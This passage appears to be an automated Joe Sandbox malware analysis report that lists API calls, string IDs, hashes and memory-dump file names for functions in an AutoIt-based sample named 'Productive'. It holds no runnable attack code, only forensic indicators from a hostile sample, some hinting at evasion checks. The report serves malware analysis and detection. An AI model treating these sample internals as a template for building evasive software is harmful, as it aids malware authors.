                                                                                                                                                                • Instruction Fuzzy Hash: B8E01A79900204AFCB06AF60D80869D7BF9EF8C354F118408FE5AAB210CB7CA5518F50
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: X
                                                                                                                                                                • API String ID: 0-3081909835
                                                                                                                                                                • Opcode ID: 5a61d972329c8dc81d3815a3b10052139ae8c608181d0472ede9ffd49161d2c4
                                                                                                                                                                • Instruction ID: 4a27455db7368a8697227efd8e97eda10fdc69466d07cfe53a94593cb6100f1f
                                                                                                                                                                • Opcode Fuzzy Hash: 5a61d972329c8dc81d3815a3b10052139ae8c608181d0472ede9ffd49161d2c4
                                                                                                                                                                • Instruction Fuzzy Hash: 30C1A2755143419FC719EF24C891EAAB7E4BF89350F00492DF8999B2A2DB30ED65CF82
                                                                                                                                                                APIs
                                                                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0030C057
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ContainedObject
                                                                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                                                                • API String ID: 3565006973-3941886329
                                                                                                                                                                • Opcode ID: 0362b123f57be134284cee13d71b0e2561dfa32904ed12b72bf25e6b6c4c89cb
                                                                                                                                                                • Instruction ID: 06797411123f1dccf064771aa14764716c7392f7f0ddcfeb62ec976459b2c4d4
                                                                                                                                                                • Opcode Fuzzy Hash: 0362b123f57be134284cee13d71b0e2561dfa32904ed12b72bf25e6b6c4c89cb
                                                                                                                                                                • Instruction Fuzzy Hash: 44915774211602EFDB15CF64C894A6ABBF8FF49700F20856EE90ADB6A1DB71E841CB50
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 002BE01E
                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 002BE037
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                                                                • Opcode ID: e3dd9d125cb5145e457dd7d96f1f834fb385aacb54ed62c0d575ca9648b00fe1
                                                                                                                                                                • Instruction ID: 4c9ab4ca63051cd10fc030f497f48511dfd4f7aebee4ec4421f0090317d99f03
                                                                                                                                                                • Opcode Fuzzy Hash: e3dd9d125cb5145e457dd7d96f1f834fb385aacb54ed62c0d575ca9648b00fe1
                                                                                                                                                                • Instruction Fuzzy Hash: B25149714187449BE321AF50E885BAFB7FCFB84355F51484DF2D8411A2DB709539CB16
                                                                                                                                                                APIs
                                                                                                                                                                • DecodePointer.KERNEL32(685EE5E0,0036CE88,00000024,002D8683,00000016,002DA753,0036CE68,00000008,002E4D3C), ref: 002DA854
                                                                                                                                                                • EncodePointer.KERNEL32(00000000), ref: 002DA8E0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Pointer$DecodeEncode
                                                                                                                                                                • String ID: ^h^h^h^h
                                                                                                                                                                • API String ID: 3571222163-368494544
                                                                                                                                                                • Opcode ID: 06766c9f2e0661ea6bf8c2c5891e389a5bc29f21389908b64eda071e182ee348
                                                                                                                                                                • Instruction ID: ce46e5fcbaac48189db2a25bf1f7084a590861a38f58c9af350d5ba821d889fe
                                                                                                                                                                • Opcode Fuzzy Hash: 06766c9f2e0661ea6bf8c2c5891e389a5bc29f21389908b64eda071e182ee348
                                                                                                                                                                • Instruction Fuzzy Hash: 89519E71D216069FDB29DFA8C884EACB6B0BB05325F11401BE855E7390C7B49D62DF52
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00338186
                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0033819B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID: '
                                                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                                                • Opcode ID: 1d96057f54f9855ac0b24d970deb9f31e97ace648ce9a09e5f0843d4fc211ee4
                                                                                                                                                                • Instruction ID: 73db389b5765226cb4e7ebad20156529b4701c97952d34c666243f1f3ffd5d17
                                                                                                                                                                • Opcode Fuzzy Hash: 1d96057f54f9855ac0b24d970deb9f31e97ace648ce9a09e5f0843d4fc211ee4
                                                                                                                                                                • Instruction Fuzzy Hash: FD41F774A01309AFDB15CF68C881BDABBB9FB09340F11016AE909AB351DB71A956CF90
                                                                                                                                                                APIs
                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 0033713C
                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00337178
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$DestroyMove
                                                                                                                                                                • String ID: static
                                                                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                                                                • Opcode ID: 3baa9fecb1b8c22a5f064e3c6caaab4883efcbce13a06f5c09b7dd16494da5e0
                                                                                                                                                                • Instruction ID: 85bb723ed1be30e34b32847628c7d5fd8900a0912419e6284ea8feab0be3f949
                                                                                                                                                                • Opcode Fuzzy Hash: 3baa9fecb1b8c22a5f064e3c6caaab4883efcbce13a06f5c09b7dd16494da5e0
                                                                                                                                                                • Instruction Fuzzy Hash: A031AFB2110604AEDB269F78CC80AFB77BDFF48760F119619F99587191DB30AC91DB60
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00336D86
                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00336D91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID: Combobox
                                                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                                                • Opcode ID: a8c92d64cf580fa848cac3a49b23631caef4260416553fd34f4c0377f3c19183
                                                                                                                                                                • Instruction ID: 02ea21ebb6f683d1338444e3cfa5f33c8f5e420226d739942a7ba76b6ea303a0
                                                                                                                                                                • Opcode Fuzzy Hash: a8c92d64cf580fa848cac3a49b23631caef4260416553fd34f4c0377f3c19183
                                                                                                                                                                • Instruction Fuzzy Hash: 90118671310208BFEF269E54DCC2EFB7B6EEB843A4F118125F9199B290D675DC518760
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002B214F
                                                                                                                                                                  • Part of subcall function 002B2111: GetStockObject.GDI32(00000011), ref: 002B2163
                                                                                                                                                                  • Part of subcall function 002B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002B216D
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00337296
                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 003372B0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                • String ID: static
                                                                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                                                                • Opcode ID: 989c67935dece238e147713f0976d18f9d7dc94393eba0d1b69940c37a048a6c
                                                                                                                                                                • Instruction ID: 878efc20c5b764f404e127e72563affbf944f7eed8a7f01b14ec56764b4c5577
                                                                                                                                                                • Opcode Fuzzy Hash: 989c67935dece238e147713f0976d18f9d7dc94393eba0d1b69940c37a048a6c
                                                                                                                                                                • Instruction Fuzzy Hash: A721177261420AAFDB15DFA8CC85AFA7BE8EB08314F014918FE55D3251DB35A8919B50
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00336FC7
                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00336FD6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                                                                • String ID: edit
                                                                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                                                                • Opcode ID: 5157eb6235c0ae83d6cb140286207a18add1613bd6e8ad0d8620095224072410
                                                                                                                                                                • Instruction ID: ceae73ac1625251455c5305ec2930baa178b6601167d9b9876b320231f883413
                                                                                                                                                                • Opcode Fuzzy Hash: 5157eb6235c0ae83d6cb140286207a18add1613bd6e8ad0d8620095224072410
                                                                                                                                                                • Instruction Fuzzy Hash: 12116D71100208BFEB124E64AC86EFB3BADEB05368F118714FA64971E0C775DC909B60
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 002B351D
                                                                                                                                                                • DestroyWindow.USER32(?,?,002C4E61), ref: 002B3576
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                • String ID: h4
                                                                                                                                                                • API String ID: 2587070983-1240665206
                                                                                                                                                                • Opcode ID: f8225d5928b659b593c4b154c8767f11be99c36cb29bdbd858c3fc1361104aab
                                                                                                                                                                • Instruction ID: ba9e65d6e6b1da7550fa23938d308b4e7b824a120e47efe5897a6409f22d4b67
                                                                                                                                                                • Opcode Fuzzy Hash: f8225d5928b659b593c4b154c8767f11be99c36cb29bdbd858c3fc1361104aab
                                                                                                                                                                • Instruction Fuzzy Hash: 71215434628211DFCB3ADF18DC59BA933E8AB48350F44415DE80E8B261DB70EEA0CF42
                                                                                                                                                                APIs
                                                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003228F8
                                                                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00322921
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$OpenOption
                                                                                                                                                                • String ID: <local>
                                                                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                                                                • Opcode ID: bd90ff6402c9f4379313b8f0ba7339cf7ed77a174ce7f9daa5866ab716ea1fe0
                                                                                                                                                                • Instruction ID: b92d517e0219f12e1c99de03bc8385442e13fedd664726f4a4ec820430139717
                                                                                                                                                                • Opcode Fuzzy Hash: bd90ff6402c9f4379313b8f0ba7339cf7ed77a174ce7f9daa5866ab716ea1fe0
                                                                                                                                                                • Instruction Fuzzy Hash: 2B11E370501235BAEB2A8F519C88EF7FFACFF16350F10822AF50586000E370A890D6E0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 003286E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0032849D,?,00000000,?,?), ref: 003286F7
                                                                                                                                                                • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003284A0
                                                                                                                                                                • htons.WSOCK32(00000000,?,00000000), ref: 003284DD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                                                                • String ID: 255.255.255.255
                                                                                                                                                                • API String ID: 2496851823-2422070025
                                                                                                                                                                • Opcode ID: 0673f14ec3f7018848834e9902dfe9478803b72ff21decf152f1a38e1bb61a25
                                                                                                                                                                • Instruction ID: cc717a05df611a12df4d7437c28c51007a25bfe42d28a94924285c2842ae9e6d
                                                                                                                                                                • Opcode Fuzzy Hash: 0673f14ec3f7018848834e9902dfe9478803b72ff21decf152f1a38e1bb61a25
                                                                                                                                                                • Instruction Fuzzy Hash: E211E535201216ABDB15AF64DC42FAEB768FF00310F10861AFA119B2D1DB31A910CA95
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0030B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0030B7BD
                                                                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00309A2B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClassMessageNameSend
                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                • API String ID: 3678867486-1403004172
                                                                                                                                                                • Opcode ID: ad9c6454f6f0ba5e217403367bd04f753577dc42b09f53890dff514240191c14
                                                                                                                                                                • Instruction ID: 3bfa4ca58e6afafdeaae630c25902061774cdad04689a5d567624e0978679f03
                                                                                                                                                                • Opcode Fuzzy Hash: ad9c6454f6f0ba5e217403367bd04f753577dc42b09f53890dff514240191c14
                                                                                                                                                                • Instruction Fuzzy Hash: 3C01F571A52114ABCB15EBA4CC62EFEB369EF57320B00070AF866572D2DF305928CA50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0030B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0030B7BD
                                                                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00309923
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClassMessageNameSend
                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                • API String ID: 3678867486-1403004172
                                                                                                                                                                • Opcode ID: f31fef99b82c577edb5d7a62df83b841c026402b05e99a94132770ff6c28853e
                                                                                                                                                                • Instruction ID: b631302133d74790f87559a91a929edb5fa6661db97f368a6203ac04553921bd
                                                                                                                                                                • Opcode Fuzzy Hash: f31fef99b82c577edb5d7a62df83b841c026402b05e99a94132770ff6c28853e
                                                                                                                                                                • Instruction Fuzzy Hash: 0C01AC75A531046BCB15EBA0C962FFF73AC9F16340F10011EB956672D2DB105F18DAB1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0030B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0030B7BD
                                                                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 003099A6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClassMessageNameSend
                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                • API String ID: 3678867486-1403004172
                                                                                                                                                                • Opcode ID: be2819485a4a301bc8ace769ccbdf7b26d935313c97756d016e6b2ced34d232a
                                                                                                                                                                • Instruction ID: b4d33b81d1fe0c5739ab85eb80078a3d73782cfdea30e5be6250d079312b3538
                                                                                                                                                                • Opcode Fuzzy Hash: be2819485a4a301bc8ace769ccbdf7b26d935313c97756d016e6b2ced34d232a
                                                                                                                                                                • Instruction Fuzzy Hash: 4201AC72A5310466CB15E764C952FFFB3AC9F12340F10011AB846732D2DB155F189971
                                                                                                                                                                APIs
                                                                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003088A0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message
                                                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                • API String ID: 2030045667-4017498283
